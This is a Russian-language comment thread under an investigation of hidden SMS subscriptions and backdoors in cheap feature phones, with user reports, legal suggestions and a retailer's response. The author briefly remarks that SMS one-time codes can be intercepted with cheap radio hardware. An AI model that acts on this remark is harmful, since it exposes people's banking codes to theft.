01.09.2021 14:47Современные кнопочные телефоны стоят копейки против тех сотен долларов которые стоили телефоны времен 3310, нечего удивляться что их делают неизвестно кто задней ногой - лишь бы работали.
quwy
01.09.2021 17:30+1Так они и проще на порядок. Мой первый Ericsson GA628 имел радиотракт на гибридных сборках, и кроме этого еще десяток цифровых микросхем на плате. А современные что? Один SoC на все про все, и к нему пара тараканчиков силовой обвязки. Даже антенна вытравлена прямо на текстолите.
balamutang
01.09.2021 18:32Ну в любом случае одни только эти гибридные сборки не стоят сотен баксов, тогда телефон был дорогой и долговременный продукт с соответствующей ценой и подходом. А сейчас клепают эти SoC'и на одну-две партии, поэтому никакой оптимизацией уже никто не занимается, тяп-ляп и в продакшн, надо уже следующую модель лепить.
И это при том что эти новые телефоны полноценные участники интернета - у них не бывает ни апдейтов ни альтернативных ос, а баги там наверняка есть, странно что их еще не эксплуатируют в хвост и гриву.
YMA
01.09.2021 14:56Уже поздно. Я пробовал попользоваться (в порядке прикола) Siemens C55. Аккумулятор на Юноне нашелся без проблем, но столкнулся с тем, что у операторов 2G уже слабеет, во многих местах на МТС и Меге кваки-бульки и даже непрозвон. При этом 3G и VoLTE - прекрасно.
В итоге мне глянулся Nokia 8110 4G, кнопочник с флипом, но на него можно поставить кастомную GerdaOS без (?) закладок и бэкдоров, и он обеспечивает прекрасное качество связи.
seraz
01.09.2021 19:29внешне 8110 4G весьма на любителя.
gerdaOS не обновляется уже годами, к сожалению. крч. искать только android кнопочные с кастомными прошивками. даже 4xA55 +3Gb+ ram будут сильно лучше поделий на kaiOS, и тп.
или может быть некие самосборы на r. pi/orange pi/... их давненько не обновляли, а последний rpi на A73, вроде бы был. новый м. быть будет на A75. а это уже неплохо. и может быть стандартные говно экраны поменяются на что-ниб более приличное, в духе mi mix 2s/3 внешностью. ips стоит копейки же.
клаву хочется кверти. рамки минимальные.
если еще и будут подороже варианты с 12/16ГБ оперативки. то однозначно вин. т. к. 12ГБ+ это сегодня только в топ и дорогущихх девайсах. за десятки к. минимум 25-30. тогда кучу народа обратят...)
ilyamodder
01.09.2021 13:54+3на Айпаде все это регистрируется без всяких СМС
После того, как смс отправилось на айфоне :) либо только по e-mail, без привязки к номеру телефона.
anonymous
00.00.0000 00:00GordeyUA
01.09.2021 11:10+9надо начинать с Айфонов, которые тоже сразу куда-то что-то отправляют. И отказаться вроде можно, но тогда Айфон превращается в бескнопочную звонилку
Не читайте до обеда советских газет (с)
Айфон отправляет один СМС для активации iMessage. Но, во первых, он об этом предупреждает, а во вторых - можно отказаться, и будет работать все, кроме iMessage.
v-oz
01.09.2021 09:03И в корне имеем обыкновенную жажду наживы. Капитализм, что ж делать...
Спасибо, что поделились.
Жаль, что с первоначальная затея не прошла
altone
01.09.2021 16:43+3Речь, вроде бы, в основном о китайских разработчиках. У них же там коммунизм во все поля?
v-oz
01.09.2021 16:51А точно прошивки делали в Китае, а не просто заливали на фабрике то, что им прислали? Половина из описанного - российские бренды, вроде сказано в посте.
<тег ХЗ>коммунизм в отдельно взятом Китае не отменяет капитализма в окружающем его мире. А как нам говорит народная мудрость - с волками жить, по-волчьи выть. То есть, ничем не гнушаются для сбора средств на R&D :)</тег ХЗ>
TheShock
03.09.2021 04:39+1То есть это был коммунизм, но виноват всё-равно капитализм?
v-oz
03.09.2021 06:31Таки заминусили XD
Коммунизм там ещё не построили, конечно. И большой вопрос, собираются ли. Прошу не придираться, иначе это уйдёт от темы поста, а я минусовать не могу, хотя и хочется.
Мне всё равно кто именно сделал такую прошивку, но она именно с целью наживы. Разве кроме тех, что отслеживают продажи. Но даже их следовало делать с уведомлением пользователя. А жажда наживы весьма характерна для капитализма. Надеюсь, с этим не будете спорить.
TheShock
08.09.2021 15:17Мне всё равно кто именно сделал такую прошивку, но она именно с целью наживы.
А может с целью шпионажа, которая характерна для тоталитарных коммунистических режимов?
Коммунизм там ещё не построили, конечно
Earthsea
01.09.2021 09:30+1Покупайте только проверенные мировые бренды: телефоны Nokia не содержат вредоносной функциональности
Но ведь Nokia это теперь тоже дикий китайский подвал. По сути из настоящих брендов остались только Alcatel, Philips, Panasonic, и то они вымирают. Моделей очень мало. И отзывы тоже надо внимательно читать, есть неудачные модели.
CDK
01.09.2021 09:41+2Philips разве не Китай уже давно?
Earthsea
01.09.2021 10:51Сходу я не нагуглил поэтому посчитал что нет. На самом деле действительно, и Philips, и Alcatel тоже давно китайские подвалы. Остается открытым вопрос о Panasonic.
Похоже что фирмовых кнопочников не осталось уже совсем.
Вот нашлась статья о продаже брендов в Китай: https://www.ferra.ru/review/mobile/most-popular-brands-bought-by-chinese.htm
ValdikSS Автор
01.09.2021 10:55Насколько понимаю, Philips и Panasonic заказывают разработку ПО у сторонних производителей.
Современные кнопочные телефоны почти все сильно уступают хорошим трубкам 15-летней давности, если уж честно.
vesper-bot
01.09.2021 14:35Вот по поводу Philips я думаю, что ПО под них максимум портировано со старых кнопочников, разработкой там и не пахло. Купил недавно хениум какой-то для звонков, так ПО один в один кирпичная железяка, которую мне в 97м подарили вместе с тарифом 26 центов за минуту. Однако в свете этой статьи начинаю думать, что может быть это и хорошо...
den_po
03.09.2021 01:09У Nokia есть и не "дикий китайский подвал", но получится ли заиметь такое для личного пользования, не знаю https://dac.nokia.com/user-equipment/
Jsty
01.09.2021 09:34+1Единственный выход - через оператора блокировать возможность выхода в интернет, как минимум.
Что насчет смс и возможно ли точечно запретить их, не знаю. Технически, думаю, возможно (опять же через оператора) реализовать белый список номеров для отправки смс.
Насколько я понимаю, даже с закладками в телефоне это условно "решит" проблему.
askv
02.09.2021 14:52У Мегафона блокировал интернет. Через какое-то время опять включили, без всякого уведомления.
Tatikoma
02.09.2021 17:28Тогда оно через bluetooth построит mesh-сеть и всё-таки утащит ваши личные данные с телефона. Одними блокировками сложно всё решить.
YMA
02.09.2021 17:40А устройства Apple не только через bluetooth смогут, там еще и UWB есть, а это быстрее и незаметнее. И квази-mesh у них уже имеется в продакшене, через которую AirTag и FindMy работают.
v1000
01.09.2021 09:41+8Я правильно понимаю, что официально продаются устройства, которые можно использовать как ботнет? Одно дело, когда это единичная отправка СМС после установки, другое дело, когда телефон позволяет выполнять запросы, подчиняясь командам извне.
Veliant
01.09.2021 09:55+1Спасибо за отличную статью!
А нельзя ли на это обратить внимание ФСБ, т.к. это теоретически можно подвести под "Специальные технические средства... устройства, специальный инструмент и программное обеспечение для электронных вычислительных машин и других электронных устройств ... которым намеренно приданы качества и свойства для обеспечения функции скрытного (тайного, неочевидного) получения информации либо доступа к ней (без ведома ее обладателя)"
blind_oracle
01.09.2021 10:25+22У ФСБ много других важных дел - ловить иностранных агентов и прочих врагов народа. Ну и деньги зарабатывать. А не вот этой вашей фигнёй заниматься...
Ok_Lenar
01.09.2021 10:38Dexp это дополнительный бренд DNS.
SandroSmith
03.09.2021 09:35И? В статье же и написано "DEXP SD2810 от российского бренда сети магазинов DNS."
И это называется не доп.бренд, а СТМ - собственная торговая марка.
LuigiVampa
01.09.2021 10:41Респект автору за исследование. Действительно, разбирать активность подобных устройств технически очень непросто, а простор для мошенничества с ними получается очень большим, поскольку пользуются ими в основном люди, не подкованные технически.
sourbarberry
01.09.2021 11:20+1Покупайте только проверенные мировые бренды: телефоны Nokia не содержат вредоносной функциональностиКек) Помню был Nokia 5800, который при настройке после каждого хард-ресета отправлял СМС с информацией о активации в неизвестном направлении)
SShtole
01.09.2021 11:25+11Отсутствие в России специализированного министерства, которое бы занималось подобными проблемами.
Тогда будет две проблемы.
MikeVC
01.09.2021 11:28Недавно ради любопытства вычищал от пакости кетайский смартфон. Пришлось выпилить абсолютно все включая звонилку и СМСилку. Т.е после этого телефон потерял возможность звонить! При этом сама система анlроид пытается куда-то ломиться. Правда, кол-во этого "левого" трафика стало пару сотен кб в месяц. System UI ломится на какой-то бла-бла-бла-amazon.com.cn
vikarti
01.09.2021 11:58Впору уже в обзорах телефонов указывать такой вот функционал.
И — не понятно что собственно брать то если надо:- нормальный телефон для звонков / смс
- не тормозящий
- без таких вот пакостей и возможностей их случайно добавить даже пройдя по ссылке
почему то в голову кроме старых iphone в голову ничего не идет (с софтом из аппстора там уже все плохо, но можно тупо не настраивать аккаунт, а даже если все же что-то найдется — откровенных троянов под не-рутованый айфон не бывает а при подозрении на рут — тупо залить прошивку.
SADKO
01.09.2021 12:57+1Я помню как то из топовых Lenovo-в выковыривал закладку, которая могла приложения ставить не явно, и рекламу крутила в уведомлениях. Телефон покупался в Англии.
Ole
01.09.2021 14:01У меня есть кнопочный аппарат DEXP Larus C6 - внешне аналог Nokia 3310.
Кто-нибудь анализировал наличие в нём подобных функций?
Левых списаний денег с него я не регистрировал.
LevOrdabesov
01.09.2021 17:05Отключение «мобильного интернета» в личном кабинете опсоса должно, по идее, решить проблему?
ValdikSS Автор
01.09.2021 21:22Да, предотвратит отправку данных и снятие денег. А вот создание заведомо нерабочего APN вряд ли поможет — операторы связи игнорируют настройки, если введён несуществующий APN, и просто предоставляют обычный мобильный интернет, словно настроен правильный APN.
hqqddy
02.09.2021 10:18я будучи на мтс лет 6 назад через лк отключал смс сервис в принципе. но потом столкнулся с тем, что совсем без смс не легче, чем без инета. а включить самому в лк было невозможно, пришлось звонить на саппорт и доказывать, что я не удав (там вообще не могли понять, почему кому-то может понадобиться отключить смс сервис и что оказывается это можно отключить было самому). как сейчас там хз, давно на йоте. но было удобно в общем-то.
rrrad
02.09.2021 12:28можно в телефоне поломать настройки отправки смс. Я когдато так себе поломал отправку смс, когда лазил по настройкам и включил опцию "отправлять через интернет". При звонке оператору мне сказали эту опцию отключить и вбить указанный ими номер смс-центра.
hqqddy
02.09.2021 10:20а ну кстати, если телефон серый (я любитель, ну не серых, но тех, что у нас не продают моделей), то с кривым апн инета может и не быть, пока не пропишешь правильный. по крайней мере у меня уже не первый американский винфон без прописки апн мобильного инета не получает никак.
ARD8S
02.09.2021 21:44Запрещал инет для филипс зениум E255, отправлял куда-то смс (промелькивало быстро и нигде не оставалось) и данные небольшими объёмами, а оператор радостно списывал деньги за пакет интернета. Аппаратов покупал два (т.к. красивые и удобные), оба "белые", куплены в разное время и в разных местах, оба ведут себя одинаково.
Akr0n
01.09.2021 18:03+3А ведь подобного рода аппараты лежат в карманах всех военных\силовиков, т.к. позиционируются командованием как "безопасные" в отличие от смартфонов... Наличие закладок в них уже тянет на совсем другую статью УК.
Psionic
01.09.2021 22:04У меня в Вадафоне тоже снимают деньги за выход в интернет, хотя эта симка в смартфоне отключена от интернета в настройках, только прием звонков (для инета другая симка).
ILYA_ZX
01.09.2021 23:10+1Очень интересное исследование, спасибо! Пару лет назад знакомый жаловался на смс вирус в кнопочном телефоне, но что все так плохо я и предположить не мог. По spreadtrum, считать прошивку и распаковать *.pac можно с помощью ResearchDownload. Разобрать/собрать stone сжатый LZMA:
spc
01.09.2021 23:50На самом деле, в свете активности китайских товарищей, очень хочется понять: что они планируют делать со всей этой бигдатой? Или это просто вроде как местечковый активизм из анекдота про «получилось»?
Или я чего-то не понимаю, или Китай — это просто другая планета, бесполезно даже размышлять над тем, зачем они влепили тот или другой бекдор туда или сюда.
ps. Заодно пока передумал продавать T28.seruga46
04.09.2021 15:43Как вариант - наладить взаимовыгодное сотрудничество с фейсбуком и подобными ему сайтами, где регистрация по телефону. Обмениваться с ними связками типа "IMEI-номер телефона". Чтобы когда пользователя в очередной раз по беспределу забанят ("ну а что, частная компания же, регистрация формально бесплатная, можем банить кого хотим и как хотим"), ему бы пришлось уже не только новую симку за 100-200 р покупать, а ещё и новую мобилу за 1000-2000. И за каждый бан часть денег от продажи новой мобилы нокла отдаёт фейсбуку.
Endlesswind
02.09.2021 13:48+14Добрый день.
От имени компании ДНС выражаем благодарность автору статьи за проведённые исследования и статью. На основании предоставленных данных нами проводится внутреннее расследование. По итогам анализа причин возвратов и отзывов на сайте, некоторые модели телефонов временно сняты с продажи для проверки наличия данной проблемы и её устранения при обнаружении.
ValdikSS Автор
02.09.2021 14:13+14Надеюсь увидеть результаты расследования в публичном пространстве, с информацией о выгодоприобретателе СМС-подписки, цепочке разработки ПО и поставки устройств, а также мер по недопущению подобной функциональности в будущем.
Обращайтесь, если нужны дополнительные подробности с моей стороны. Email есть в профиле.
Popadanec
06.09.2021 12:16Главное в ходе расследования не выйти на себя. А то бренд собственный, читать смски из другой страны китайцам вряд ли интересно.
hecategram
02.09.2021 14:06+2Ну об этом уже давно было известно. Все наши производители телефонов, это просто наклейка на телефоне и на коробке. Все делают китайцы. Что они туда пихают только им известно. И да за основу там взята прошивка BQ Наши якобы производители не имеют в своем штате технических инженеров. Получили образец и вперед продавать.
Сами эти телефоны кстати ужасные в плане передачи звука. Если брать, то только если вы работаете на стройке, в хлеву и подобных местах. Чтобы не жалко было их грязными руками брать.
Вопрос к автору. Вы не хотите китайские GSM модули для ардуино проверить. Что они там творят. А то у многих умные ворота подписки делают сами по себе ...
Aleksid1
02.09.2021 14:18Прекрасное и актуальное исследование! Спасибо.
Вот так подаришь родителям вроде безопасный телефон, а получается...
Я заметил только один момент - не факт что все телефоны проявили свои вредоносные возможности, вполне возможно у них может быть период выжидания - как раз от такого исследования, чтобы ничего не заподозрили.
AeronLee
02.09.2021 14:19-2Хорошая статья, только много чего не сходится.
По мне, больше преследовалась цель обгадить одни фирмы и вывести вверх другие.
Хотя не спорю, есть странные аппараты со странностями внутри.
ValdikSS Автор
02.09.2021 14:24+3Какие фирмы, по вашему мнению, я пытаюсь вывести вверх? У меня отпало желание пользоваться современными кнопочными телефонами: даже премиум-модели хуже стандартных устройств 15-летней давности по удобству и функциональности.
steanlab
03.09.2021 04:55+2делов то, взять bladeRF x115 и дополнить статью недостающими фирмами/вывести нужные вверх :)
отличная статья с изобретательской новизной, такие на хабре несколько раз в году бывают.
Gernar
02.09.2021 14:28"...содержат нежелательные недокументированные функции." (с)
"Результаты
4 из 5 телефонов содержат незадекларированную функциональность..." (с)
Если идет упор на незадекларированные функции, то как быть с тем, что в DEXP SD2810 прям в главном меню, никуда не прячась, находится раздел с платными подписками Funbox? И в инструкции даже об этом меню написано следующее: "Сервис представляет собой SMS подписку на различные тематические текстовые услуги. В SMS сообщении абоненту приходит текст по соответствующей тематике подписки. По умолчанию сервис отключён. "
???
ValdikSS Автор
02.09.2021 14:31+1Это документированная функция, которую можно вызвать из меню. Она отправляет СМС на другие номера, с другим текстом, пользователю выдаются стоимость подписки и действия для её отключения.
СМС-подписки присутствуют во всех телефонах, кроме бабушкофона Irbis'а. Еще в телефонах присутствуют платные игры, которые покупаются также через СМС.
SerjV
02.09.2021 15:45+1Оооо, этой хабрстатье посвятили статью на синусе: safe.cnews.ru/news/top/2021-09-02_rossijskaya_roznitsa_zavalena
ну по крайней мере автора указали, хотя по идее назвать источник им бы не помешало тоже (авторские права всё-таки...).Holmax
02.09.2021 16:03+1
prohodil_mimo
02.09.2021 16:47+6Товарищ майор, я знаю, вы читаете эти строки! Займитесь, пожалуйста, этим вопросом. Потому что бэкдоры в телефонах по всей России, выполняющие команды с серверов в Китае и с продающимися на арабских сайтах доступами - это, хотя и не сильно нарушает уголовный кодекс в каждом отдельном случае, всё же не очень соответствует стратегии национальной безопасности.
Автору - большое спасибо.
Andrey_Green
08.09.2021 14:02-) вы дали новую возможность товарищу майору теперь с Законом о национальном ПО
Внедрять в продающиеся у нас телефоны прошивку с бэкдорами и шпионажем. Теперь только простив своих граждан.
Вы оптимист, или считаете лучше стучать своим, чтобы чужие боялись?
seruga46
02.09.2021 22:37+3Потдверждаю, проблема существует, причём именно на НОКЛЕ (ладно, вот вам, nokia, чтобы поиском искалось, конкретная модель - 215 4G dual sim). Примерно раз в пару дней телефон самостоятельно выходит в интернет, несмотря на отключённую передачу данных везде в настройках. Особенно "весело" получается в роуминге: хочешь заплатить где-то через 3D-secure - заплати ещё пару сотен рублей опсосу (если телефон выключить, он, к счастью, в инет не лезет, но при включении, если последний раз включался "давно" - я не знаю, как точно измеряется "давно" - лезет сразу).
spc
03.09.2021 09:45+2И в ТАСС тоже есть читатели Хабра. Только им стыдно упоминать, что "один из пользователей...", поэтому они вытащили из коробки с нафталином целого Касперского.
Maccimo
03.09.2021 10:13Ни один из купленных телефонов не предоставляет полноценный AT-порт через USB или Bluetooth. Чтение SMS-сообщений с компьютера не реализовано нигде.
Если SDK доступны, то наверняка доступны и рекомендации по разводке платы и обвязки. Что если поискать там? Возможно, что на некоторых платформах до этой функциональности можно достучаться.
zergone
03.09.2021 11:12У меня лежит живой Fly, который не включая экрана делал звонки за границу по нескольким номерам. Каждый звонок длился по-моему 10-40 секунд. Назвонил он мне больше 3000 р (года три назад). Когда копался в проблеме, видел в сети сообщения, что в представительстве Fly прошивку людям меняли бесплатно )
zxosa
03.09.2021 12:06+7https://www.dns-shop.ru/news/374ef223-0bc4-11ec-a2b1-00155dbd7634/
Днс начал отзывную кампанию
Popadanec
03.09.2021 15:53Запахло жареным. По нашим законам продавец будет крайним и уже потом сам может судится с производителем.
alecv
04.09.2021 01:05+3Полагаю, старый iPhone 5 или даже 4 - лучший бабушкофон. Яркий, лёгкий, ломается и рутуется легко, запчастей навалом (принес ремонтникам посмеяться iPhone 5 вздутый как батончик, внутри все погнуто и сломано - починили зачем-то, взяли 1200 руб. замена дисплея, новая батарейка +выгиб платы назад, даже запустилась, +рихтовка корпуса).
tormozedison
04.09.2021 12:57Самым безопасным из пяти протестированных телефонов оказался самый дешёвый.
А почему бы не организовать "Кноптест" по образцу "Ламптеста"? Разумеется, не только по этому показателю оценивать, но и по глючности, реальной ёмкости батареи, чувствительности, и др.
zxosa
04.09.2021 14:01Никому это не надо, реальные потребители этих устройств на форумы почти не заглядывают.
seruga46
05.09.2021 02:57Мне кажется, это ошибочный стереотип, что кнопочными телефонами пользуются только пенсионеры. Или вы думаете, что рост спроса на кнопочные телефоны - это резко выросло количество пенсионеров, а не резко выросли угрозы информационной безопасности и, соответственно, защиты от неё?
Так что я думаю, что этот возросший спрос на кнопочные телефоны вполне пересекается с аудиторией хабра и форумов. Другое дело, что они могут по аналогичным причинам мало писать, чтобы не подставляться лишний раз, но читать - почему нет?
Maccimo
04.09.2021 15:46Лампы это расходник, а мобильный телефон — капитальные вложения на несколько лет.
Popadanec
04.09.2021 18:57Вот потому в магазинах почти сплошной шлак. Если бы люди покупали лампы с гарантией минимум 2-3 года и возвращали бы в случае поломки, то они бы
стоили дорожене бракодельничали.
rtkprg2
06.09.2021 09:32+1эээ, нет! Лампы - это тоже капитальное вложение на несколько лет. Мы ведь не о лампах накаливания, а о высокотехнологичных светодиодных лампах. И цена таких ламп иногда приближается к цене мобильных телефонов.
Popadanec
06.09.2021 12:14Это телефоны приближаются по цене к лампам. А так полностью согласен. Каждый производитель заявляет о десятках тысяч часов ресурса, но у некоторых они системно даже 10% ресурса не отрабатывают.
ommunist
05.09.2021 22:31Чтение SMS сообщений с компьютера было реализовано в SonyEricsson T68i . Была такая программка написанная если память не подводит Allan Odgaard, тем что потом написал TextMate. Nokia PC Suite вроде даже в CSV умел экспортировать SMSки.
axe_chita
06.09.2021 03:48Nokia PC Suite точно умеет сохранять смс в CSV, единственное не всегда корректно сшивал длинные СМС.
vlmvlm
06.09.2021 00:23Спасибо, отличный разбор. Вопрос от чайника: никакого файрволла для смартфонов в природе не существует? Если уж не с возможностью запрета, то хотя бы с логгингом и алармами.
Chamie
06.09.2021 11:54Для смартфонов — конечно существуют (NetGuard и прочие no-root, например, под Андроидом). Проблема в том, что в статье описываются не смарт-, а «dumb»-фоны.
mosco
06.09.2021 00:23Ну да , ну да, пошёл я нафиг... Пытался летом или весной посмотреть биллинг за месяц. так Билайн новую оферту предлагает принять. а по ней, тотальная слежка за пользователем... Не стал её принимать, сижу без распечаток теперь...
ViolinistMan
06.09.2021 00:23Очень интересное исследование, спасибо. Работаю приемщиком в ломбарде цифровой техники, полезная информация для моей работы.
pahom-ka
07.09.2021 15:48+1Подтверждаю наличие бекдора. Видел даже вживую, в салоне МегаФона (по франшизе). Бэкдор модели "Косякова", так было написано на бейджике.
Причём сработал даже без телефона.
Купил симку, "бэкдор" вставила её в какой-то кнопочный телефон, что-то там понажимала, на мой вопрос "Что вы делаете?" ответила "Активирую сим-карту". Придя домой увидел, что "бэкдор" активировал подписку на 50р в день.
freemanon
08.09.2021 17:02ValdikSS, когда вы включили свою базовую станцию, то звонки и смс соседей пошли через вашу станцию? Получается с оборудованием за 650$ можно перехватить например смс-код от онлайн-банка? или это так не работает?
Aelliari
08.09.2021 18:03Его бс не включена в сеть оператора. Телефон либо благодаря сим-каре (можно и самому купить и "прошить"), либо тупо по самому сильному сигналу подключился. Обмен телефон-бс ему доступен. А вот обмен оператор-бс-телефон уже нет
ValdikSS Автор
09.09.2021 00:21когда вы включили свою базовую станцию, то звонки и смс соседей пошли через вашу станцию?
Нет, я ограничил возможность подключения только моей SIM-картой, для всех остальных аутентификация не проходила.
Получается с оборудованием за 650$ можно перехватить например смс-код от онлайн-банка?
Вообще — да, если базовая станция использует шифрование A5/1 (а таких, судя по информации gsmmap.org за 2019, у МТС около 50%), и даже дешевле — то же самое можно проделать на Motorola C118 за $30 с aliexpress.
dzvonkovskiy
17.09.2021 23:56+3Подтверждаю кейс с телефонами BQ. В декабре 2020-го купил детям-дошкольникам кнопочные телефоны «BQ One Power 1846» на Ситилинке. Про наличие у телефонов GPRS был в курсе. Через несколько месяцев, просматривая статистику расходов, заметил списания за инет-трафик. Сначала думал дети что-то натыкали (в телефонах есть встроенные Java-игры), но списания происходили даже тогда, когда дети не прикасались к телефонам. Заметил, что еcли телефоны включены целый день, они сами что-то шлют в инет 2 раза в сутки по 1-2 Кб, за что списывается 5 р/сутки (тариф без инета). Пришлось полностью отключить услуги GPRS, WAP, MMS. После прочтения данной статьи. Стал внимательно просматривать историю СМС на телефонах и в статистике оператора. Увидел много СМС на короткие номера 1042, 9800, 5557, 7497, 4446, хотя ни я ни дети (они еще даже не умеют) их не отравляли, да папка исходящих СМС на телефоне пустая. Несколько часов назад приходит СМС с номера 4446 «неудалось подключить услугу». В исходящих СМС естественно пусто, в статистике оператора эту СМС вижу. В инете нахожу (https://gsmwiki.ru/chto-za-nomer/4446/), что номер 4446 принадлежит не оператору а компании I-free (https://i-free.com/). Видимо прошивку для моих телефонов делала именно компания I-free )))
santjagocorkez
На самом деле есть еще, пусть и небольшой, но шанс перевести эту проблему в плоскость уголовного производства. Небольшой - всего лишь из-за вероятного противодействия или бездействия соответствующих органов. Фактически идёт внедрение в ПО телефона шпионского функционала (и тогда "нарушение тайны связи") или ст. 272/273 УК РФ. Это особенно весело, если производитель (уполномоченная организация/импортёр) пойдут в отказ, мол, быть не может, наши телефоны самые телефонные и чисты, как слёзы ребёнка (вот, мы специально довели ребёнка до слёз и сравнили).
ValdikSS Автор
Я не вижу других вариантов, кроме как писать в ФСБ или Отдел «К». Но делать это нужно, имея веские основания и какое-никакое доказательство вредоносной активности, что сложно для обычного покупателя подобных устройств.
Насколько понимаю, DEXP и Irbis уже давно сняты с производства и уже почти не продаются (я купил почти последние устройства в июне), а новых супер-вредоносных моделей я не знаю. Тайну связи, в случае с F+ или BQ, наверное, применить не получится — она, вроде как, не нарушается.
santjagocorkez
Там, где не нарушается тайна связи, очень могут быть признаки ст. 272/273. Веские доказательства - это сам телефон, который можно предоставить следствию на исследование. Ну и, конечно же, придётся попинывать: запрашивать материалы проверки в порядке УПК РФ. Анализировать эти материалы. Обжаловать, если следствие уклонилось от исследования или совершения иных процессуальных действий, особенно, если они необходимы для разрешения заявления, с указанием этих действий. И так далее.
ne555
Откуда такая информация? 'Злополучная модель', упомянутая в статье — в продажах.
Ждать пока кто-то купит ваши персональные данные (смс-номер, как упомянуто в статье) и будет в Tg рассылать какие-нибудь сообщения террористческой направленности с открытым номером в настройках мессенджера?
Здесь даже слово "жаль" не подходит к тому, как функционирует гос.ведомство. Вместо того чтобы проявить интерес и в конечном итоге (после изучения/подтверждения фактов и работой сообща с РКН/Потребнадзором), направить материалы к силовикам, приостановив 'преступную деятельность' на территории страны.
Правильно, что приобщили 'их' к своему расследованию. Еще СМИ подхватит, заслуживающий внимания, материал... Может начнут понимать что к чему теперь.
ValdikSS Автор
Везде «Товара нет в наличии», хоть цена и отображается.
ne555
А полтора часа назад была эта модель в наличии (я делал оформление ее, но не оплачивал).
Видимо эффект от статьи уже начал распространяться.
ps/ А автору рекомендую 'забэкапить данные гаджеты в банковской ячейке' на случай, если кто-то попытается причинить вам вред из-за данного расследования.
muxa_ru
Она могла висеть просто закэшенная в базе сайта и при обработке Вашей попытки актуализировать информацию из реальной базы товаров.
Tatikoma
Она могла так же уйти в резерв, если покупатель сложил последний товар в корзину. Можно завтра проверить, не вернётся ли в продажу.
Burunduk73
Нескладушки получаются) В статье было заявлено "Были куплены почти случайные телефоны", потом были сделаны выводы - "4 из 5 телефонов содержат незадекларированную функциональность", а также даны рекомендации не жалейте своих денег покупайте Нокию, и вдруг в комментариях выясняется что, как минимум два из четырех злодея давно сняты с производства и чтобы их купить надо еще постараться. Моделей кнопочных телефонов тысячи и брендов десятки, но рекламная статейка запугивает обывателей, что есть только один чистый бренд, остальные серые лошадки. Подобная статистика отражает только желание ввести в заблуждение. Ни путей решения проблемы для покупателя, ни способов борьбы с продавцом. С тем же успехом можно проводить опрос - хорошо ли живётся россиянам, сидя в буфете госдумы
ValdikSS Автор
Проблема кнопочных телефонов локальных брендов в том, что их часто выпускают одной-двумя партиями, а затем просто долго продают (год-два). Уверен, уже через год вы не сможете купить в магазине ни одну из моделей, упомянутых в статье, хотя тот же Flip 3 появился в продаже сравнительно недавно.
Поэтому сложно дать какую-то другую рекомендацию, кроме как покупать устройство бренда с мировым именем, в надежде на лучшее.
Я сам не знаю, как правильно поступать в этой ситуации в правовом поле, для меня это не было главной задачей. Юрист (непрофильный) тоже не подсказал чего-то, что не упомянуто в статье. Если вы знаете, в какое ведомство нужно обращаться — напишите.
aamonster
Вопрос, кому принадлежит нынешняя нокия и можно ли её считать "брендом с мировым именем".
geher
Вроде как телефонный бренд Nokia принадлежит финской компании HMD Global.
Насчет бренда с мировым именем - вопрос открытый. С одной стороны Nokia - бренд с солидной историей и мировым именем. С другой стороны этот бренд омрачен пребыванием в лапах Microsoft, а HMD Global пока что не та самая Nokia (и в плане качества продукции тоже).
bazzilic
Мне казалось, Microsoft выкупил всё телефонное подразделение Nokia вместе с брендом для телефонов. Нет?
DMGarikk
Как купил, так и продал, продал HMD Global
bazzilic
Понятно, я как-то пропустил новость про продажу.
F0iL
Справедливости ради, будучи в составе Microsoft они выпускали очень даже неплохие аппараты.
Maximuzz
ага, кидая обновлениями то одну модель телефона, то другую
Krypt
Считать-то можно, только толку-то: Nokia 8110 4G тоже что-то слал, раз в несколько дней. Слал даже при отключённом интернет-соединении и не сконфигурированных профилях, по 15 рублей за попытку…
Где-то на яндекс.маркете мой отзыв с одной звездой лежит в том числе и по этому поводу (можете поискать, там у меня аватар такой же как и тут, ссылку же на коммент яндекс скопировать не даёт)
flashmozzg
Именно слал (смс?) или опсос байты трафика округлял до 15 рублей? Если второе, то вина 99% на стороне оператора связи. Я такое воспроизводил почти на любом телефоне с 4G от сяоми, до Айфона. Как минимум на Теле2 и Билайне.
Не знаю злой умысел ли (перетащить людей на тарифы с абонентской платой) или просто раздолбайство (криво настроенный учёт трафика, который считает какие-то служебные 4G пакеты).
Krypt
Нет, это был gprs траффик, с не настроенным (и отключённым в настройках) доступом, на тарифе без доступа к интернету. Проходил по минимальному размеру пакета. Соответственно пришлось отключать gprs услуги у оператора.
Вот выдержка из выписки (Tele2, выписка сохранилась под отзывом к телефону):
20.08.2018 21:26:08 Страйк Internet-трафик Трафик: 662 байт 662 00: 00 0,95 15,00
21.08.2018 23:52:07 Страйк Internet-трафик Трафик: 152 байт 152 00: 00 0,95 15,00
24.08.2018 23:53:00 Страйк Internet-трафик Трафик: 152 байт 152 00: 00 0,95 15,00
Там было больше, запрос был отправлен раз 7. Собственно я нашёл этот факт именно потому, что я пытался понять почему у меня стали испаряться деньги со счёта.
flashmozzg
Ну вот такая фигня как раз от 4G. Можно было отделаться запретом 4G на телефоне.
В этой ветке полно таких репортов с оф. позицией "данная проблема возникает из-за особенностей вашей операционной системы.": http://tele2life.ru/forumweb/viewtopic.php?f=6&t=1096&p=130629#p130629
Krypt
> Можно было отделаться запретом 4G на телефоне
Был включён. Я вообще отключил/запретил на телефоне всё что там можно было касающееся интернета.
Кстати, ValdikSS, Вам Nokia 8110 4G на растерзание не нужен?
flashmozzg
Мб только для интернета 4G отключил. Нужно было вообще запретить (мб на той Нокии не отключался, а только предпочтение можно было отдать, там вроде не Андроид, а что-то своё).
Maccimo
Если эта статья — реклама, то автора нужно номинировать на каннского льва или хотя бы на Effie.
ifap
Списание денег со счета абонента — это и будет вредоносная активность, т.к. материальный ущерб налицо, ст.273 УК РФ. Сложности могут возникнутьс с квалификацией по ст.272, т.к. где там охраняемая законом информация — бабка надвое сказала, не видя содержания исходящей SMS/http сказать сложно. Если надумаете — обращайтесь, поможем подготовить обращения в инстанции.
wataru
С таким маленьким ущербом наши органы шевелиться не будут.
ifap
По 273-й ущерб не обязателен.
zxosa
а может подготовите типовое заявление в прокуратуру? я пока схожу телефон куплю и распаковывать не буду.
ifap
Как Вы видите такое заявление? Я, имярек, купил телефон Х, а внутри — обнаружил малварь! Прилагаю к заявлению нераспакованный телефон? ;) И причем тут прокуратура?
somarov
То есть Вы зачем-то, где-то, скачали прошивку с бекдором, вопрос зачем? Если в магазине вам дали "чистый" телефон ?
ValdikSS Автор
